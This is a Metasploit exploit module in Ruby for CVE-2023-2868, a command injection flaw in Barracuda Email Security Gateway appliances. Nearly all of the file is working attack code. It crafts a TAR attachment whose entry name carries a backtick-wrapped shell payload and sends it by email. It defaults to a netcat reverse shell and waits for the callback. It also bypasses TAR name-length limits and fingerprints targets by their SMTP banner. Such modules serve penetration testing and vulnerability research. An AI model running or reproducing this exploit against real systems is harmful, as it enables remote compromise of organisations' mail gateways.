##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
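class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::SMTPDeliver

  # Module metadata, payload constraints and operator options.
  #
  # The payload constraints follow from how the command reaches the shell
  # (see #exploit): the command is embedded in a TAR entry name as '`CMD`',
  # so a single quote or backtick inside CMD would terminate the wrapper
  # early, and a NUL would end the ustar name field; CR/LF are excluded so
  # the entry name cannot disturb the MIME/SMTP framing around it.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Barracuda ESG TAR Filename Command Injection',
        'Description' => %q{
          This module exploits CVE-2023-2868, a command injection vulnerability in
          Barracuda Email Security Gateway (ESG) appliances. The vulnerability exists
          in how the ESG processes TAR file attachments - filenames containing shell
          metacharacters (backticks) are passed directly to shell commands during
          extraction, allowing remote command execution.

          The exploit sends an email with a specially crafted TAR attachment where
          the filename contains a backtick-wrapped command. When the ESG processes
          this attachment, the command is executed as the mail processing user.

          Note: Payload execution may take 30-90 seconds after email delivery.
          Amavisd queues and processes attachments asynchronously.

          Affected versions: Barracuda ESG firmware prior to May 2023 patch.

          Payloads containing single quotes or backticks are incompatible with
          the injection mechanism. Use cmd/unix/generic with a custom CMD for
          specialized payload requirements.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Mandiant', # Discovery and analysis
          'cfielding-r7', # Original PoC
          'Curt Hyvarinen' # Metasploit module
        ],
        'References' => [
          ['CVE', '2023-2868'],
          ['URL', 'https://www.barracuda.com/company/legal/esg-vulnerability'],
          ['URL', 'https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally'],
          ['URL', 'https://attackerkb.com/topics/NCRbE1IDJP/cve-2023-2868']
        ],
        'DisclosureDate' => '2023-05-23',
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Payload' => {
          'Space' => 490,
          'DisableNops' => true,
          'BadChars' => "'\`\x00\r\n"
        },
        'Targets' => [
          ['Unix Command', {}]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat',
          # Execution is asynchronous (Amavisd queue, typically 30-90 s after
          # delivery per the description above). The framework default of a
          # 2 s wait-for-session would abandon the handler long before the
          # callback can arrive; give the queue time to drain.
          'WfsDelay' => 120
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        OptString.new('MAILTO', [true, 'Target email address on the ESG']),
        OptString.new('MAILFROM', [true, 'Sender email address', '[email protected]']),
        OptString.new('SUBJECT', [true, 'Email subject line', 'Quarterly Report']),
        OptString.new('BODY', [false, 'Email body text (default: random string)']),
        OptString.new('FILENAME', [false, 'TAR attachment filename (default: random.tar)'])
      ]
    )
  end

  # Banner-based fingerprint of the SMTP listener.
  #
  # Returns Detected when the greeting names Barracuda. Every other outcome
  # is Unknown: the SMTP banner is operator-configurable, so a generic or
  # missing greeting does not prove the host is *not* a Barracuda ESG, and
  # CheckCode::Safe asserts exactly that. Connection failures are also
  # reported as Unknown rather than Safe.
  def check
    connect
    banner_str = banner.to_s

    return CheckCode::Detected('Barracuda ESG detected in SMTP banner') if banner_str.match?(/barracuda/i)

    if banner_str.strip.empty?
      return CheckCode::Unknown('No SMTP banner received, cannot confirm Barracuda ESG')
    end

    CheckCode::Unknown('SMTP server detected, but cannot confirm Barracuda ESG')
  rescue Rex::ConnectionError => e
    CheckCode::Unknown("Connection failed: #{e.message}")
  ensure
    disconnect
  end

  # Builds the TAR, wraps it in a MIME message and hands it to the SMTP
  # delivery mixin. Returns as soon as the MTA accepts the message; the
  # payload runs later, when the ESG's attachment scanner unpacks the TAR.
  def exploit
    cmd = payload.encoded

    # '`CMD`': the single quotes keep the surrounding shell command line
    # intact, while the backticks are evaluated as command substitution when
    # the vulnerable code interpolates the entry name into a shell command.
    malicious_filename = "'`#{cmd}`'"

    print_status('Generating malicious TAR with payload filename')
    # Report bytes, not characters: the ustar header limits are byte counts.
    vprint_status("Payload filename length: #{malicious_filename.bytesize} bytes")
    tar_data = create_malicious_tar(malicious_filename)

    print_status('Composing email with TAR attachment')
    email_data = generate_exploit_email(tar_data)

    print_status("Sending exploit email to #{datastore['MAILTO']} via #{rhost}:#{rport}")
    send_message(email_data)

    print_good('Email sent successfully')
    print_status('Payload will execute when ESG processes the attachment')
  end

  # Writes a single-entry TAR whose entry name is +malicious_filename+ and
  # returns the archive as a String.
  #
  # Rex::Tar::Writer inherits from Gem::Package::TarWriter, whose #split_name
  # enforces the ustar 100-byte name / 155-byte prefix limits. The injection
  # string is far longer than that, so #split_name is replaced with a
  # permissive version. It is installed as a singleton method on this one
  # writer instance rather than redefined on the class: the previous
  # class-level patch was only undone on the success path, so an exception
  # while writing would have left every other module in this framework
  # process running with the limit check disabled. A singleton method needs
  # no restore step and cannot leak.
  #
  # NOTE(review): the ustar header still stores the name in a fixed 100-byte
  # field. Confirm that the writer actually emits slash-free names longer
  # than 100 bytes rather than silently truncating them before relying on
  # the full 490-byte payload space.
  def create_malicious_tar(malicious_filename)
    tar_io = StringIO.new

    Rex::Tar::Writer.new(tar_io) do |tar|
      tar.define_singleton_method(:split_name) do |name|
        prefix = ''
        if name.bytesize > 100
          parts = name.split('/', -1)
          name = parts.pop
          prefix = parts.join('/')
          # Move path components back into the name until the prefix fits
          # its 155-byte field and the name is non-empty.
          while !parts.empty? && (prefix.bytesize > 155 || name.empty?)
            name = "#{parts.pop}/#{name}"
            prefix = parts.join('/')
          end
        end
        [name, prefix]
      end

      # The entry body is irrelevant to the injection; random filler keeps
      # the archive well-formed and non-constant across runs.
      content = Rex::Text.rand_text_alpha(32)
      tar.add_file_simple(malicious_filename, 0o644, content.length) do |io|
        io.write(content)
      end
    end

    tar_io.string
  end

  # Builds the MIME message carrying +tar_data+ as an attachment and returns
  # it as a String ready for send_message.
  #
  # BODY and FILENAME are optional: when unset or blank, random alphabetic
  # values are used so repeated runs do not produce identical messages.
  def generate_exploit_email(tar_data)
    msg = Rex::MIME::Message.new
    msg.mime_defaults
    msg.from = datastore['MAILFROM']
    msg.to = datastore['MAILTO']
    msg.subject = datastore['SUBJECT']

    body_text = datastore['BODY'].to_s
    body_text = Rex::Text.rand_text_alpha(rand(16..32)) if body_text.strip.empty?
    msg.add_part(body_text, 'text/plain', nil, 'inline')

    attachment_name = datastore['FILENAME'].to_s
    attachment_name = "#{Rex::Text.rand_text_alpha(8)}.tar" if attachment_name.strip.empty?
    msg.add_part_attachment(tar_data, attachment_name)

    msg.to_s
  end
end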